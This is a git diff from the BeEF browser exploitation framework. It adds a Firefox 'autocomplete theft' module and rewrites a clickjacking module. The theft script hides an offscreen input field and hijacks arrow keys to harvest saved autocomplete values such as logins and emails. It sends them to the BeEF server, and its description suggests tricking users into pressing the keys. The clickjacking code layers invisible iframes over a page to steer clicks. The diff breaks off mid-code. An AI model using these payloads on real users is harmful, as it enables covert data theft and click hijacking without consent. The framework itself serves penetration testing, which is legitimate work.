a/modules/phonegap/phonegap_stop_record_audio/module.rb +++ b/modules/phonegap/phonegap_stop_record_audio/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/social_engineering/autocomplete_theft/command.js b/modules/social_engineering/autocomplete_theft/command.js new file mode 100644 index 000000000..7527b72a8 --- /dev/null +++ b/modules/social_engineering/autocomplete_theft/command.js @@ -0,0 +1,75 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + steal_autocomplete = function() { + + var results = []; + + // hijack keys and set focus + get_autocomplete = function (){ + window.addEventListener("keydown",function(e){ + switch(e.keyCode) { + case 37: // left + scrollTo(window.pageXOffset-20, window.pageYOffset); + break; + case 38: // up + scrollTo(window.pageXOffset, window.pageYOffset-20); + break; + case 39: // right + scrollTo(window.pageXOffset+20, window.pageYOffset); + break; + case 40: // down + scrollTo(window.pageXOffset, window.pageYOffset+20); + break; + default:break; + } + },false); + document.getElementById("placeholder").focus(); + + } + + inArray = function(el, arr){ + for (var i = 0;i < arr.length;i++) + if (el===arr[i]) + return true; + return false; + } + + steal = function(n,v) { + var val = JSON.stringify({'input':n,'value':v}); + if (v != "" && !inArray(val,results)){ + results.push(val); + beef.debug("[Module - autocomplete_theft] Found saved string: '" + val + "'"); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val); + } + } + + tt = function(ev) { + if (ev.keyCode == 37 || ev.keyCode == 39) setTimeout(function(){ ev.target.blur(); },100); + } + + // create hidden input element + input = document.createElement('input'); + input.setAttribute("id", "placeholder"); + input.setAttribute("name", "<%= @input_name %>"); + input.setAttribute("style", "position:relative;top:-1000px;left:-1111px;width:1px;height:1px;border:none;"); + input.setAttribute("type", "text"); + input.onkeyup = function(event) { tt(event); } + input.onkeydown = function(event) { tt(event); } + input.onblur = function(event) { steal(this.name,this.value);var o=this;setTimeout(function(){ o.focus();},100);this.value = "";document.body.removeChild(this); } + document.body.appendChild(input); + + // steal autocomplete + get_autocomplete(); + + } + + setTimeout("steal_autocomplete();", 100); + +}); + diff --git a/modules/social_engineering/autocomplete_theft/config.yaml b/modules/social_engineering/autocomplete_theft/config.yaml new file mode 100644 index 000000000..b79eac020 --- /dev/null +++ b/modules/social_engineering/autocomplete_theft/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + steal_autocomplete: + enable: true + category: "Social Engineering" + name: "Steal Autocomplete" + description: "This module steals autocomplete values from Firefox. The user must press the up or down arrow keys twice, followed by the left or right arrow key, in order to steal autocomplete information.
Hint: Try convincing the user to enter the Konami code (Up, Up, Down, Down, Left, Right, Left, Right, B, A, Enter)." + authors: ["Stefano Di Paola", "bcoles"] + target: + working: ["FF"] + not_working: ["ALL"] diff --git a/modules/social_engineering/autocomplete_theft/module.rb b/modules/social_engineering/autocomplete_theft/module.rb new file mode 100644 index 000000000..45ab2f35d --- /dev/null +++ b/modules/social_engineering/autocomplete_theft/module.rb @@ -0,0 +1,49 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# Based on the PoC by Stefano Di Paola +# Ported to BeEF by bcoles +# For more information see: http://blog.mindedsecurity.com/2011/10/autocompleteagain.html +################################################################################ +class Steal_autocomplete < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'input_name', + 'type' => 'combobox', + 'ui_label' => 'Input Field Name', + 'store_type' => 'arraystore', + 'store_fields' => ['element_name'], + 'store_data' => [ + ['login'], + ['email'], + ['Email'], + ['session[username_or_email]'], + ['q'], + ['search'], + ['name'], + ['company'], + ['city'], + ['state'], + ['country'], + ], + 'emptyText' => 'Select an input field name to steal autocomplete values', + 'valueField' => 'element_name', + 'displayField' => 'element_name', + 'mode' => 'local', + 'autoWidth' => true + } + ] + end + + def post_execute + content = {} + content['results'] = @datastore['results'] + save content + end + +end + diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js index 70985c019..8dfe3a35f 100644 --- a/modules/social_engineering/clickjacking/command.js +++ b/modules/social_engineering/clickjacking/command.js @@ -1,92 +1,139 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { - - var offset_top = "<%= @offset_top %>"; - var offset_left = "<%= @offset_left %>"; - var url = "<%= @url %>"; - var debug = <%= @debug %>; - - if (debug) opacity = 10; else opacity = 0; - - // create container - var cjcontainer = document.createElement('div'); - cjcontainer.id = "cjcontainer"; - cjcontainer.setAttribute("style", "-moz-opacity:"+opacity); - cjcontainer.style.zIndex = 999; - cjcontainer.style.border = "none"; - cjcontainer.style.width = "30px"; - cjcontainer.style.height = "20px"; - cjcontainer.style.overflow = "hidden"; - cjcontainer.style.position = "absolute"; - cjcontainer.style.opacity = opacity; - cjcontainer.style.filter = "alpha(opacity="+opacity+")"; - cjcontainer.style.cursor = "default"; - document.body.appendChild(cjcontainer); - - // create iframe - var cjiframe = document.createElement('iframe'); - cjiframe.id = "cjiframe"; - cjiframe.src = url; - cjiframe.scrolling = "no"; - cjiframe.frameBorder = "0"; - cjiframe.allowTransparency = "true"; - cjiframe.style.overflow = "hidden"; - cjiframe.style.position = "absolute"; - cjiframe.style.top = offset_top+"px"; - cjiframe.style.left = offset_left+"px"; - cjiframe.style.width = "200px"; - cjiframe.style.height = "100px"; - cjiframe.style.border = "none"; - cjiframe.style.cursor = "default"; - cjcontainer.appendChild(cjiframe); - - // followmouse code by rsnake - // http://ha.ckers.org/weird/followmouse.html - // modified by bcoles - function followmouse(e){ - - var xcoord = 0; - var ycoord = 0; - var gettrailobj = function() { - if (document.getElementById) - return document.getElementById("cjcontainer").style; - else if (document.all) - return document.all.container.style; - } - if (typeof e != "undefined") { - xcoord += e.pageX - 10; - ycoord += e.pageY - 15; - } else if (typeof window.event != "undefined") { - xcoord += document.body.scrollLeft + event.clientX; - ycoord += document.body.scrollTop + event.clientY; - } - var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15; - var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight) - gettrailobj().left = xcoord + "px"; - gettrailobj().top = ycoord + "px"; + var elems = { + outerFrame: "cjFrame", + innerFrame: "innerFrame", + btn: "persistentFocusBtn" } - // hook to mousemove event - if (window.addEventListener) { - window.addEventListener('mousemove', followmouse, false); - } else if (window.attachEvent) { - window.attachEvent('mousemove', followmouse); + var clicked = 0; + var src = "<%= @iFrameSrc %>"; + var secZone = "<%= @iFrameSecurityZone %>"; + var sandbox = "<%= @iFrameSandbox %>"; + var visibility = "<%= @iFrameVisibility %>"; + + var clicks = [ + {js:"<%= URI.escape(@clickaction_1) %>", posTop:cleanPos("<%= @iFrameTop_1 %>"), posLeft:cleanPos("<%= @iFrameLeft_1 %>")}, + {js:"<%= URI.escape(@clickaction_2) %>", posTop:cleanPos("<%= @iFrameTop_2 %>"), posLeft:cleanPos("<%= @iFrameLeft_2 %>")}, + {js:"<%= URI.escape(@clickaction_3) %>", posTop:cleanPos("<%= @iFrameTop_3 %>"), posLeft:cleanPos("<%= @iFrameLeft_3 %>")}, + {js:"<%= URI.escape(@clickaction_4) %>", posTop:cleanPos("<%= @iFrameTop_4 %>"), posLeft:cleanPos("<%= @iFrameLeft_4 %>")}, + {js:"<%= URI.escape(@clickaction_5) %>", posTop:cleanPos("<%= @iFrameTop_5 %>"), posLeft:cleanPos("<%= @iFrameLeft_5 %>")}, + {js:"<%= URI.escape(@clickaction_6) %>", posTop:cleanPos("<%= @iFrameTop_6 %>"), posLeft:cleanPos("<%= @iFrameLeft_6 %>")}, + {js:"<%= URI.escape(@clickaction_7) %>", posTop:cleanPos("<%= @iFrameTop_7 %>"), posLeft:cleanPos("<%= @iFrameLeft_7 %>")}, + {js:"<%= URI.escape(@clickaction_8) %>", posTop:cleanPos("<%= @iFrameTop_8 %>"), posLeft:cleanPos("<%= @iFrameLeft_8 %>")}, + {js:"void(0);", posTop:'-', posLeft:'-'} + ] + + var iframeAttrs = {}; + iframeAttrs.src = src; + (secZone == "on") ? iframeAttrs.security = "restricted" : ""; + (sandbox == "on") ? iframeAttrs.sandbox = "allow-forms" : ""; + + var iframeStyles = {}; + iframeStyles.width = "<%= @iFrameWidth %>px"; + iframeStyles.height = "<%= @iFrameHeight %>px"; + iframeStyles.opacity = (visibility == "on") ? "0.6" : "0.0"; + iframeStyles.filter = (visibility == "on") ? "alpha(opacity=60)" : "alpha(opacity=0)"; + + var innerPos = {}; + //initialize iframe + innerPos.top = clicks[0].posTop + "px"; + innerPos.left = clicks[0].posLeft + "px"; + + //returns a negative version of a number, or if NaN returns a dash + function cleanPos(coordinate) { + var iCoordinate = parseInt(coordinate); + if (isNaN(iCoordinate)) + return "-"; + else if (iCoordinate > 0) + return (-1 * iCoordinate) + return iCoordinate } - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event'); + function init(params, styles, stylesInner, callback) { + var container = $j.extend(true, {'border':'none', 'position':'absolute', 'z-index':'100000', 'overflow':'hidden'}, styles); + var inner = $j.extend(true, {'border':'none', 'position':'absolute', 'width':'2000px', 'height':'10000px'}, stylesInner); + var containerDiv = $j('
').css(container).prependTo('body'); + var containerDiv = $j('').appendTo('body'); + + var innerIframe = $j('